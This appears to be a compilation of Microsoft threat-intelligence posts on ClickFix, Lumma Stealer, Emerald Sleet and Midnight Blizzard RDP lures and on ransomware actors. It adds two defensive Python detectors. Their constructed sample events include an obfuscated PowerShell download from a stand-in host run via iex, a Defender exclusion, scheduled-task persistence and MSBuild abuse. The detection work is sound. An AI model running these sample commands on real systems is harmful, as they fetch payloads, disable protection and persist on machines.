Machine learning is a key driver in the constant evolution of security technologies at Microsoft. Machine learning allows Microsoft 365 to scale next-gen protection capabilities and enhance cloud-based, real-time blocking of new and unknown threats.
In May, machine learning and behavior-based detection foiled a massive #Dofoil (#SmokeLoader) campaign. Within milliseconds, multiple metadata-based machine learning models in the cloud started blocking the threat at first sight, protecting more than 400K machines in 12 hours. cloudblogs.microsoft.com/microsoftsecur…
The power of machine learning is that it is scalable and powerful enough to detect noisy, massive campaigns, but also specific enough to detect targeted attacks with very few signals, including social engineering attacks whether limited or large-scale. cloudblogs.microsoft.com/microsoftsecur…
The evolution driven by predictive technologies, machine learning, applied science, and artificial intelligence helps Windows Defender AV to repeatedly earn top scores in independent tests. cloudblogs.microsoft.com/microsoftsecur…
Machine learning also powers Office 365 ATP to detect malicious attachments in social engineering email campaigns. This boosts defense for email, which continues to be one of the primary entry points for credential phishing, targeted attacks, and malware. cloudblogs.microsoft.com/microsoftsecur…
Machine learning technologies in Windows Defender ATP flag and expose threats that would otherwise remain unnoticed amidst the continuous hum of billions of normal events and the inability of traditional sensors to react to unfamiliar and subtle stimuli. cloudblogs.microsoft.com/microsoftsecur…
Microsoft Defender Experts identified a widespread ClickFix social engineering campaign in February 2026 leveraging Windows Terminal as the primary execution mechanism. Rather than the traditional Win + R → paste → execute technique, this campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, guiding users into a privileged command execution environment that blends into legitimate administrative workflows and appears more trustworthy to users.
This approach bypasses detections specifically tuned to Run dialog abuse while exploiting the legitimacy and familiarity of Windows Terminal. Once the terminal is opened, targets are prompted to paste malicious PowerShell commands delivered through fake CAPTCHA pages, troubleshooting prompts, or verification-style lures designed to appear routine and benign.
What makes this campaign notable are the post-compromise outcomes. The first attack path begins when a user pastes a hex-encoded, XOR-obfuscated command copied from the ClickFix lure into a Windows Terminal session. This action spawns additional Windows Terminal/PowerShell instances, ultimately launching another powershell.exe process responsible for decoding the embedded hex commands.
The decoded PowerShell script downloads a legitimate but renamed 7-Zip binary and saves it with a randomized file name, along with a ZIP payload. The renamed archive utility extracts and executes a multi-stage attack chain that includes retrieval of additional payloads, persistence through scheduled tasks, defense evasion through Microsoft Defender exclusions, and exfiltration of stolen machine and network data.
The final-stage payload, deployed to C:\ProgramData\app_config\ctjb, is found to be a Lumma Stealer component that performs QueueUserAPC()-based code injection into chrome.exe and msedge.exe processes. The stealer targets high-value browser artifacts, including Web Data and Login Data, harvesting stored credentials and exfiltrating them to attacker-controlled infrastructure.
In the second attack path, when a user pastes a hex-encoded, XOR-obfuscated command into Windows Terminal, the command downloads a randomly named .bat file to AppData\Local and invokes it through cmd.exe to write a VBScript to %Temp%. The batch script is then executed via cmd.exe with the /launched command-line argument, and again through MSBuild.exe, which is LOLBin abuse.
The script connects to cryptocurrency blockchain RPC endpoints, indicating use of the EtherHiding technique (fetching attacker data from smart-contract storage). It also performs QueueUserAPC()-based code injection into chrome.exe and msedge.exe processes to harvest Web Data and Login Data.
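The chain above (a shell launched under Windows Terminal with a hex blob on its command line, followed by a Defender exclusion, a scheduled task and MSBuild running a non-project file) is something a hunter can express as rules over process-creation telemetry. The following is an added example written for this page, not Microsoft's detection logic: it runs over constructed Sysmon/DeviceProcessEvents-style events and uses a hypothetical single-byte XOR key only to build and decode the sample blob; the actual encoding scheme used by the campaign is not described on the page.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (constructed, Sysmon EID 1 style)."""
    pid: int
    ppid: int
    image: str      # full image path
    cmdline: str


# A run of 64+ hex characters not glued to other alphanumerics.
HEX_BLOB = re.compile(r"(?<![0-9A-Za-z])[0-9a-fA-F]{64,}(?![0-9A-Za-z])")
TERMINAL_IMAGES = {"windowsterminal.exe", "wt.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PROJECT_INPUT = re.compile(r"\.(cs|vb|fs|vcx)?proj\b|\.sln\b", re.I)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(command: str, key: bytes) -> str:
    """hex(XOR(command)) - assumed scheme, used only to build the sample."""
    return xor_bytes(command.encode(), key).hex()


def deobfuscate(blob: str, key: bytes) -> str:
    return xor_bytes(bytes.fromhex(blob), key).decode("utf-8", errors="replace")


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(ev: ProcEvent, by_pid: dict, max_depth: int = 16) -> list:
    """Image basenames of the parent chain, nearest parent first."""
    chain, cur = [], by_pid.get(ev.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def analyze(events: list, xor_key: bytes = None) -> list:
    """Return (pid, rule, detail) findings for the ClickFix chain described above."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        img, low, chain = basename(ev.image), ev.cmdline.lower(), ancestry(ev, by_pid)
        blob = HEX_BLOB.search(ev.cmdline)
        # Shell spawned somewhere under Windows Terminal carrying a long hex blob.
        if img in SHELL_IMAGES and blob and any(a in TERMINAL_IMAGES for a in chain):
            detail = f"{len(blob.group())}-char hex blob under {chain[0]}"
            if xor_key:  # decode for the analyst when the key is known
                detail += " -> " + deobfuscate(blob.group(), xor_key)
            findings.append((ev.pid, "clickfix_terminal_hex_command", detail))
        if "add-mppreference" in low and "exclusion" in low:
            findings.append((ev.pid, "defender_exclusion_added", ev.cmdline))
        if img == "schtasks.exe" and "/create" in low:
            findings.append((ev.pid, "scheduled_task_persistence", ev.cmdline))
        if img == "msbuild.exe" and not PROJECT_INPUT.search(ev.cmdline):
            findings.append((ev.pid, "msbuild_nonproject_input", ev.cmdline))
    return findings


# Constructed sample: hypothetical key, hypothetical URL, paths modelled on the page.
SAMPLE_KEY = b"\x5a"
SAMPLE_INNER = "iwr http://payload.invalid/7z.zip -OutFile C:\\ProgramData\\app_config\\a.zip"
SAMPLE_BLOB = obfuscate(SAMPLE_INNER, SAMPLE_KEY)
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe", "wt.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command \"$h='" + SAMPLE_BLOB + "'; iex (decode $h)\""),
    ProcEvent(310, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command Add-MpPreference -ExclusionPath C:\\ProgramData\\app_config"),
    ProcEvent(320, 310, r"C:\Windows\System32\schtasks.exe",
              "schtasks.exe /create /tn Updater /tr C:\\ProgramData\\app_config\\ctjb /sc minute"),
    ProcEvent(330, 310, r"C:\Windows\System32\cmd.exe", "cmd.exe /c C:\\Users\\u\\AppData\\Local\\kxq.bat /launched"),
    ProcEvent(340, 330, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              "MSBuild.exe C:\\Users\\u\\AppData\\Local\\kxq.bat"),
    # Benign activity that must not fire: an admin listing files, a developer build.
    ProcEvent(400, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -Command Get-ChildItem"),
    ProcEvent(410, 100, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "MSBuild.exe MyApp.csproj"),
]

if __name__ == "__main__":
    for pid, rule, detail in analyze(SAMPLE_EVENTS, SAMPLE_KEY):
        print(pid, rule, detail[:90])
```

The terminal-ancestry rule is what distinguishes this campaign from Run-dialog ClickFix: the parent chain is WindowsTerminal.exe rather than explorer.exe, so a detection tuned only to the Run dialog never sees it. The hex-blob length threshold and the XOR key are tuning knobs, not facts from the page.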
Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by the threat actor.
To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a spear-phishing email with a PDF attachment.
To read the PDF file attached to the email, the target is lured to click a URL with instructions to register their device. The registration link has instructions to open PowerShell as an administrator and paste code provided by Emerald Sleet.
In the last quarter of 2024, Microsoft Threat Intelligence observed developments in the ransomware ecosystem that researchers and defenders should watch for in 2025. 🧵
Exploitation of vulnerabilities remains a key method for initial access. In October, the threat actor Lace Tempest, known for exploiting 0-days in file-transfer software, was observed exploiting vulnerabilities in Cleo products (CVE-2024-50623, CVE-2024-55956).
This exploitation activity increased in December and, as in past campaigns, Lace Tempest performed double extortion via the Clop leak site. Among ransomware leak sites, however, RansomHub saw the most activity.
Microsoft Threat Intelligence has observed Russian threat actor Midnight Blizzard sending a series of highly targeted spear-phishing emails to individuals in government, academia, defense, non-governmental organizations, and other sectors. msft.it/6011W3CGX
Based on our investigation of previous Midnight Blizzard spear-phishing campaigns, we assess that the goal of this operation is likely intelligence collection.
The spear-phishing emails in this campaign were sent to thousands of targets in over 100 organizations and contained a signed Remote Desktop Protocol (RDP) configuration file that connected to an actor-controlled server.
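An .rdp attachment is a plain-text file of name:type:value lines (s = string, i = integer, b = binary), which makes it easy to inspect at the mail gateway before a user double-clicks it. The checker below is an added example, not Microsoft's tooling: it parses a constructed file and flags the settings a defender would want to see, an external target host, local resource redirection, RemoteApp mode, ignored server-authentication failures and the presence of a signature (a signature only proves someone signed the file, not that the signer is trusted). The sample file and the trusted-domain suffix list are assumptions; the page does not say which settings the actor's file contained.

```python
import re

RDP_LINE = re.compile(r"^(?P<key>[^:]+):(?P<type>[sib]):(?P<value>.*)$")
HOST_PORT = re.compile(r"^\[?(?P<host>[^\]]+?)\]?(?::(?P<port>\d{1,5}))?$")


def parse_rdp(text: str) -> dict:
    """Parse name:type:value lines into a dict; 'i' values become int."""
    settings = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = RDP_LINE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not an RDP setting: {line!r}")
        value = m["value"]
        if m["type"] == "i":
            value = int(value)
        settings[m["key"].strip().lower()] = value
    return settings


def target_host(settings: dict) -> str:
    """Host part of 'full address', with an optional :port stripped."""
    addr = settings.get("full address", "")
    m = HOST_PORT.match(addr)
    return (m["host"] if m else addr).lower()


def assess(settings: dict, trusted_suffixes=(".corp.example",)) -> list:
    """Return (rule, detail) findings for a parsed .rdp file."""
    findings = []
    host = target_host(settings)
    if not any(host == s.lstrip(".") or host.endswith(s) for s in trusted_suffixes):
        findings.append(("external_rdp_target", host))
    if settings.get("drivestoredirect"):          # "*" = every local drive
        findings.append(("drive_redirection", settings["drivestoredirect"]))
    if settings.get("redirectclipboard") == 1:
        findings.append(("clipboard_redirection", "1"))
    if settings.get("redirectsmartcards") == 1:
        findings.append(("smartcard_redirection", "1"))
    if settings.get("devicestoredirect"):
        findings.append(("device_redirection", settings["devicestoredirect"]))
    if settings.get("remoteapplicationmode") == 1:
        findings.append(("remoteapp_mode", settings.get("remoteapplicationprogram", "")))
    if settings.get("authentication level") == 0:  # 0 = connect even if server auth fails
        findings.append(("server_auth_failure_ignored", "0"))
    if "signature" in settings:
        findings.append(("signed_file", "signature present; verify the signer before trusting"))
    return findings


# Constructed sample attachment; host, program name and signature are placeholders.
SAMPLE_RDP = """\
screen mode id:i:2
full address:s:proxy.example.invalid:3389
remoteapplicationmode:i:1
remoteapplicationprogram:s:||placeholder
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
redirectcomports:i:1
devicestoredirect:s:*
authentication level:i:0
promptcredentialonce:i:0
signscope:s:Full Address,Remote Application Mode,Drive Store Direct
signature:s:AQABAAEAAABQbGFjZWhvbGRlclNpZ25hdHVyZQ==
"""

if __name__ == "__main__":
    for rule, detail in assess(parse_rdp(SAMPLE_RDP)):
        print(f"{rule:28} {detail}")
```

Drive and device redirection are the settings that turn a connection to an actor-controlled server into an outbound data path: the remote side can read the client's mapped drives, clipboard and smart cards. A gateway rule that quarantines .rdp attachments whose full address falls outside the organisation's own suffixes catches this class of lure regardless of who signed the file.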
Microsoft observed the financially motivated threat actor tracked as Vanilla Tempest using INC ransomware for the first time to target the healthcare sector in the United States.
Vanilla Tempest receives hand-offs from Gootloader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool.
The threat actor then performs lateral movement through Remote Desktop Protocol (RDP) and uses the Windows Management Instrumentation Provider Host to deploy the INC ransomware payload.
In the second quarter of 2024, financially motivated threat actor Octo Tempest, our most closely tracked ransomware threat actor, added RansomHub and Qilin to its ransomware payloads in campaigns.
Octo Tempest, known for its sophisticated social engineering techniques, identity compromise and persistence, focus on targeting VMware ESXi servers, and deployment of BlackCat ransomware, accounts for a significant share of our investigations and incident response engagements.
RansomHub is a ransomware as a service (RaaS) payload used by more and more threat actors, including ones that have historically used other (sometimes defunct) ransomware payloads (like BlackCat), making it one of the most widespread ransomware families today.